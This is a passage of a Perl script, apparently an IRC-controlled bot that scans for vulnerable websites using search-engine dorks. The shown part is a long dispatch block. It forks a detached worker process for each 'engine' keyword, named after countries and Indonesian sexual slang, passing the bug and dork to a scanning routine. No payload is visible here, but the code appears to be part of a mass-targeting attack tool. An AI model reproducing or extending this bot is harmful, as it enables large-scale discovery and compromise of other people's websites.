  1515.         if ($engine =~ /Shinta-n-Jojo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Shinta-n-Jojo",$type,$nick); } exit; } }
  1516.  
  1517.         if ($engine =~ /Jenita-Janet/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Jenita-Janet",$type,$nick); } exit; } }
  1518.  
  1519.         if ($engine =~ /uae/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"UAE",$type,$nick); } exit; } }
  1520.  
  1521.         if ($engine =~ /myanmar/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Myanmar",$type,$nick); } exit; } }
  1522.  
  1523.         if ($engine =~ /argentina/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Argentina",$type,$nick); } exit; } }
  1524.  
  1525.         if ($engine =~ /austria/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Austria",$type,$nick); } exit; } }
  1526.  
  1527.         if ($engine =~ /australia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Australia",$type,$nick); } exit; } }
  1528.  
  1529.         if ($engine =~ /brazil/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Brazil",$type,$nick); } exit; } }
  1530.  
  1531.         if ($engine =~ /canada/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Canada",$type,$nick); } exit; } }
  1532.  
  1533.         if ($engine =~ /chili/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Chili",$type,$nick); } exit; } }
  1534.  
  1535.         if ($engine =~ /cina/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Cina",$type,$nick); } exit; } }
  1536.  
  1537.         if ($engine =~ /comersil/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CoMersil",$type,$nick); } exit; } }
  1538.  
  1539.         if ($engine =~ /czech/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Czech",$type,$nick); } exit; } }
  1540.  
  1541.         if ($engine =~ /germany/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Germany",$type,$nick); } exit; } }
  1542.  
  1543.         if ($engine =~ /denmark/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Denmark",$type,$nick); } exit; } }
  1544.  
  1545.         if ($engine =~ /spain/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Spain",$type,$nick); } exit; } }
  1546.  
  1547.         if ($engine =~ /europe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Europe",$type,$nick); } exit; } }
  1548.  
  1549.         if ($engine =~ /france/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"France",$type,$nick); } exit; } }
  1550.  
  1551.         if ($engine =~ /hungary/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Hungary",$type,$nick); } exit; } }
  1552.  
  1553.         if ($engine =~ /indonesia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Indonesia",$type,$nick); } exit; } }
  1554.  
  1555.         if ($engine =~ /israel/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Israel",$type,$nick); } exit; } }
  1556.  
  1557.         if ($engine =~ /india/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"India",$type,$nick); } exit; } }
  1558.  
  1559.         if ($engine =~ /info/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Info",$type,$nick); } exit; } }
  1560.  
  1561.         if ($engine =~ /iran/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Iran",$type,$nick); } exit; } }
  1562.  
  1563.         if ($engine =~ /italy/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Italy",$type,$nick); } exit; } }
  1564.  
  1565.         if ($engine =~ /japan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Japan",$type,$nick); } exit; } }
  1566.  
  1567.         if ($engine =~ /korea/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Korea",$type,$nick); } exit; } }
  1568.  
  1569.         if ($engine =~ /mexico/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Mexico",$type,$nick); } exit; } }
  1570.  
  1571.         if ($engine =~ /malaysia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Malaysia",$type,$nick); } exit; } }
  1572.  
  1573.         if ($engine =~ /network/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Network",$type,$nick); } exit; } }
  1574.  
  1575.         if ($engine =~ /netherlands/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Netherlands",$type,$nick); } exit; } }
  1576.  
  1577.         if ($engine =~ /organization/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Organization",$type,$nick); } exit; } }
  1578.  
  1579.         if ($engine =~ /philippines/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Philippines",$type,$nick); } exit; } }
  1580.  
  1581.         if ($engine =~ /poland/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Poland",$type,$nick); } exit; } }
  1582.  
  1583.         if ($engine =~ /romania/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Romania",$type,$nick); } exit; } }
  1584.  
  1585.         if ($engine =~ /russian/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Russian",$type,$nick); } exit; } }    
  1586.  
  1587.         if ($engine =~ /thailand/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Thailand",$type,$nick); } exit; } }
  1588.  
  1589.         if ($engine =~ /ukraine/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Ukraine",$type,$nick); } exit; } }
  1590.  
  1591.         if ($engine =~ /england/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"England",$type,$nick); } exit; } }
  1592.  
  1593.         if ($engine =~ /usa/i)   { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"USA",$type,$nick); } exit; } }
  1594.  
  1595.         if ($engine =~ /slovenia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Slovenia",$type,$nick); } exit; } }
  1596.  
  1597.         if ($engine =~ /belgium/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Belgium",$type,$nick); } exit; } }
  1598.  
  1599.         if ($engine =~ /bussines/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Bussines",$type,$nick); } exit; } }
  1600.  
  1601.         if ($engine =~ /southafrica/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SouthAfrica",$type,$nick); } exit; } }
  1602.  
  1603.         if ($engine =~ /vietnam/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Vietnam",$type,$nick); } exit; } }
  1604.  
  1605.         if ($engine =~ /tuvalu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Tuvalu",$type,$nick); } exit; } }
  1606.  
  1607.         if ($engine =~ /cocos/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Cocos",$type,$nick); } exit; } }
  1608.  
  1609.         if ($engine =~ /turky/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Turky",$type,$nick); } exit; } }
  1610.  
  1611.         if ($engine =~ /asia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Asia",$type,$nick); } exit; } }
  1612.  
  1613.         if ($engine =~ /serbia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Serbia",$type,$nick); } exit; } }
  1614.  
  1615.         if ($engine =~ /singapore/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Singapore",$type,$nick); } exit; } }
  1616.  
  1617.         if ($engine =~ /taiwan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Taiwan",$type,$nick); } exit; } }
  1618.  
  1619.         if ($engine =~ /sweden/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Sweden",$type,$nick); } exit; } }
  1620.  
  1621.         if ($engine =~ /pakistan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Pakistan",$type,$nick); } exit; } }
  1622.  
  1623.         if ($engine =~ /norway/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Norway",$type,$nick); } exit; } }
  1624.  
  1625.         if ($engine =~ /montenegro/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Montenegro",$type,$nick); } exit; } }
  1626.  
  1627.         if ($engine =~ /greece/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Greece",$type,$nick); } exit; } }
  1628.  
  1629.         if ($engine =~ /education/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Education",$type,$nick); } exit; } }
  1630.  
  1631.         if ($engine =~ /goverment/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Goverment",$type,$nick); } exit; } }
  1632.  
  1633.         if ($engine =~ /kazakhstan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Kazakhstan",$type,$nick); } exit; } }
  1634.  
  1635.         if ($engine =~ /afganistan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Afganistan",$type,$nick); } exit; } }
  1636.  
  1637.         if ($engine =~ /albania/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Albania",$type,$nick); } exit; } }
  1638.  
  1639.         if ($engine =~ /algeria/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Algeria",$type,$nick); } exit; } }
  1640.  
  1641.         if ($engine =~ /angola/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Angola",$type,$nick); } exit; } }
  1642.  
  1643.         if ($engine =~ /armenia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Armenia",$type,$nick); } exit; } }
  1644.  
  1645.         if ($engine =~ /azerbaijan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Azerbaijan",$type,$nick); } exit; } }
  1646.  
  1647.         if ($engine =~ /bahrain/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Bahrain",$type,$nick); } exit; } }
  1648.  
  1649.         if ($engine =~ /bangladesh/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Bangladesh",$type,$nick); } exit; } }
  1650.  
  1651.         if ($engine =~ /belarus/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Belarus",$type,$nick); } exit; } }
  1652.  
  1653.         if ($engine =~ /bhutan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Bhutan",$type,$nick); } exit; } }
  1654.  
  1655.         if ($engine =~ /bolivia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Bolivia",$type,$nick); } exit; } }
  1656.  
  1657.         if ($engine =~ /bosnia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Bosnia",$type,$nick); } exit; } }
  1658.  
  1659.         if ($engine =~ /bulgaria/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Bulgaria",$type,$nick); } exit; } }
  1660.  
  1661.         if ($engine =~ /brunei/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Brunei",$type,$nick); } exit; } }
  1662.  
  1663.         if ($engine =~ /cambodia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Cambodia",$type,$nick); } exit; } }
  1664.  
  1665.         if ($engine =~ /cameroon/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Cameroon",$type,$nick); } exit; } }
  1666.  
  1667.         if ($engine =~ /christmas/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Christmas",$type,$nick); } exit; } }
  1668.  
  1669.         if ($engine =~ /costarika/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CostaRika",$type,$nick); } exit; } }
  1670.  
  1671.         if ($engine =~ /croatia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Croatia",$type,$nick); } exit; } }
  1672.  
  1673.         if ($engine =~ /cuba/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Cuba",$type,$nick); } exit; } }
  1674.  
  1675.         if ($engine =~ /cyprus/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Cyprus",$type,$nick); } exit; } }
  1676.  
  1677.         if ($engine =~ /dominican/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Dominican",$type,$nick); } exit; } }
  1678.  
  1679.         if ($engine =~ /equador/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Equador",$type,$nick); } exit; } }
  1680.  
  1681.         if ($engine =~ /egypt/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Egypt",$type,$nick); } exit; } }
  1682.  
  1683.         if ($engine =~ /estonia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Estonia",$type,$nick); } exit; } }
  1684.  
  1685.         if ($engine =~ /finland/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Finland",$type,$nick); } exit; } }
  1686.  
  1687.         if ($engine =~ /georgia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Georgia",$type,$nick); } exit; } }
  1688.  
  1689.         if ($engine =~ /ghana/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Ghana",$type,$nick); } exit; } }
  1690.  
  1691.         if ($engine =~ /grenada/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Grenada",$type,$nick); } exit; } }
  1692.  
  1693.         if ($engine =~ /honduras/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Honduras",$type,$nick); } exit; } }
  1694.  
  1695.         if ($engine =~ /hongkong/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Hongkong",$type,$nick); } exit; } }
  1696.  
  1697.         if ($engine =~ /iceland/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Iceland",$type,$nick); } exit; } }    
  1698.  
  1699.         if ($engine =~ /ireland/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Ireland",$type,$nick); } exit; } }
  1700.  
  1701.         if ($engine =~ /kenya/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Kenya",$type,$nick); } exit; } }
  1702.  
  1703.         if ($engine =~ /kuwait/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Kuwait",$type,$nick); } exit; } }
  1704.  
  1705.         if ($engine =~ /laos/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Laos",$type,$nick); } exit; } }
  1706.  
  1707.         if ($engine =~ /latvia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Latvia",$type,$nick); } exit; } }
  1708.  
  1709.         if ($engine =~ /liberia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Liberia",$type,$nick); } exit; } }
  1710.  
  1711.         if ($engine =~ /libyan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Libyan",$type,$nick); } exit; } }
  1712.  
  1713.         if ($engine =~ /lithuania/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Lithuania",$type,$nick); } exit; } }
  1714.  
  1715.         if ($engine =~ /macedonia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Macedonia",$type,$nick); } exit; } }
  1716.  
  1717.         if ($engine =~ /malta/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Malta",$type,$nick); } exit; } }
  1718.  
  1719.         if ($engine =~ /mongolia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Mongolia",$type,$nick); } exit; } }
  1720.  
  1721.         if ($engine =~ /mozambique/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Mozambique",$type,$nick); } exit; } }
  1722.  
  1723.         if ($engine =~ /namibia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Namibia",$type,$nick); } exit; } }
  1724.  
  1725.         if ($engine =~ /nauru/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Nauru",$type,$nick); } exit; } }
  1726.  
  1727.         if ($engine =~ /nepal/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Nepal",$type,$nick); } exit; } }
  1728.  
  1729.         if ($engine =~ /newzealand/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NewZealand",$type,$nick); } exit; } }
  1730.  
  1731.         if ($engine =~ /nigeria/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Nigeria",$type,$nick); } exit; } }
  1732.  
  1733.         if ($engine =~ /paraguay/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Paraguay",$type,$nick); } exit; } }
  1734.  
  1735.         if ($engine =~ /peru/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Peru",$type,$nick); } exit; } }
  1736.  
  1737.         if ($engine =~ /portugal/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Portugal",$type,$nick); } exit; } }
  1738.  
  1739.         if ($engine =~ /puertorico/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PuertoRico",$type,$nick); } exit; } }
  1740.  
  1741.         if ($engine =~ /qatar/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PuertoRico",$type,$nick); } exit; } }
  1742.  
  1743.         if ($engine =~ /saintlucia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SaintLucia",$type,$nick); } exit; } }
  1744.  
  1745.         if ($engine =~ /samoa/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Samoa",$type,$nick); } exit; } }
  1746.  
  1747.         if ($engine =~ /saudiarabia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SaudiArabia",$type,$nick); } exit; } }
  1748.  
  1749.         if ($engine =~ /senegal/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Senegal",$type,$nick); } exit; } }
  1750.  
  1751.         if ($engine =~ /slovakia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Slovakia",$type,$nick); } exit; } }
  1752.  
  1753.         if ($engine =~ /srilanka/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Srilanka",$type,$nick); } exit; } }
  1754.  
  1755.         if ($engine =~ /swaziland/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Swaziland",$type,$nick); } exit; } }
  1756.  
  1757.         if ($engine =~ /tajikistan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Tajikistan",$type,$nick); } exit; } }
  1758.  
  1759.         if ($engine =~ /tanzania/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Tanzania",$type,$nick); } exit; } }
  1760.  
  1761.         if ($engine =~ /tokelau/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Tokelau",$type,$nick); } exit; } }
  1762.  
  1763.         if ($engine =~ /tonga/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Tonga",$type,$nick); } exit; } }
  1764.  
  1765.         if ($engine =~ /tunisia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Tunisia",$type,$nick); } exit; } }
  1766.  
  1767.         if ($engine =~ /uruguay/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Uruguay",$type,$nick); } exit; } }
  1768.  
  1769.         if ($engine =~ /uzbekistan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Uzbekistan",$type,$nick); } exit; } }
  1770.  
  1771.         if ($engine =~ /venezuela/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Venezuela",$type,$nick); } exit; } }
  1772.  
  1773.         if ($engine =~ /yemen/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Yemen",$type,$nick); } exit; } }
  1774.  
  1775.         if ($engine =~ /yugoslavia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Yugoslavia",$type,$nick); } exit; } }
  1776.  
  1777.         if ($engine =~ /zambia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Zambia",$type,$nick); } exit; } }
  1778.  
  1779.         if ($engine =~ /uganda/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Uganda",$type,$nick); } exit; } }
  1780.  
  1781.         if ($engine =~ /trinidad/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Trinidad",$type,$nick); } exit; } }
  1782.  
  1783.         if ($engine =~ /zimbabwe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Zimbabwe",$type,$nick); } exit; } }
  1784.  
  1785.         if ($engine =~ /kontol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"KonToL",$type,$nick);    } exit; }}
  1786.  
  1787.         if ($engine =~ /pepek/i) {
  1788.  
  1789.         if (my $pid = fork) { waitpid($pid, 0); }
  1790.  
  1791.         else { if (fork) { exit; } else {
  1792.  
  1793.                 &type($chan,$bug,$dork,"PePek",$type,$nick);
  1794.  
  1795.                 } exit; }
  1796.  
  1797.     }  
  1798.  
  1799.         if ($engine =~ /tetek/i) {
  1800.  
  1801.         if (my $pid = fork) { waitpid($pid, 0); }
  1802.  
  1803.         else { if (fork) { exit; } else {
  1804.  
  1805.             &type($chan,$bug,$dork,"TeTek",$type,$nick);
  1806.  
  1807.         } exit; }
  1808.  
  1809.     }
  1810.  
  1811.         if ($engine =~ /itil/i) {
  1812.  
  1813.         if (my $pid = fork) { waitpid($pid, 0); }
  1814.  
  1815.         else { if (fork) { exit; } else {
  1816.  
  1817.         &type($chan,$bug,$dork,"ItiL",$type,$nick);
  1818.  
  1819.         } exit; }
  1820.  
  1821.     }                          
  1822.  
  1823.         if ($engine =~ /vagina/i) {
  1824.  
  1825.     if (my $pid = fork) { waitpid($pid, 0); }
  1826.  
  1827.         else { if (fork) { exit; } else {
  1828.  
  1829.         &type($chan,$bug,$dork,"Vagina",$type,$nick);
  1830.  
  1831.         } exit; }
  1832.  
  1833.     }  
  1834.  
  1835.         if ($engine =~ /nennen/i) {
  1836.  
  1837.         if (my $pid = fork) { waitpid($pid, 0); }
  1838.  
  1839.         else { if (fork) { exit; } else {
  1840.  
  1841.                 &type($chan,$bug,$dork,"NenNen",$type,$nick);
  1842.  
  1843.                 } exit; }
  1844.  
  1845.     }
  1846.  
  1847.         if ($engine =~ /susu/i) {
  1848.  
  1849.         if (my $pid = fork) { waitpid($pid, 0); }
  1850.  
  1851.         else { if (fork) { exit; } else {
  1852.  
  1853.                 &type($chan,$bug,$dork,"SuSu",$type,$nick);
  1854.  
  1855.                 } exit; }
  1856.  
  1857.     }          
  1858.  
  1859.         if ($engine =~ /buahdada/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BuahDada",$type,$nick); } exit; } }
  1860.  
  1861.         if ($engine =~ /payudara/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PayuDara",$type,$nick); } exit; } }
  1862.  
  1863.         if ($engine =~ /kentot/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Kentot",$type,$nick); } exit; } }
  1864.  
  1865.         if ($engine =~ /memek/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MeMek",$type,$nick); } exit; } }
  1866.  
  1867.         if ($engine =~ /emel/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"eMeL",$type,$nick); } exit; } }
  1868.  
  1869.         if ($engine =~ /oral/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"OraL",$type,$nick); } exit; } }
  1870.  
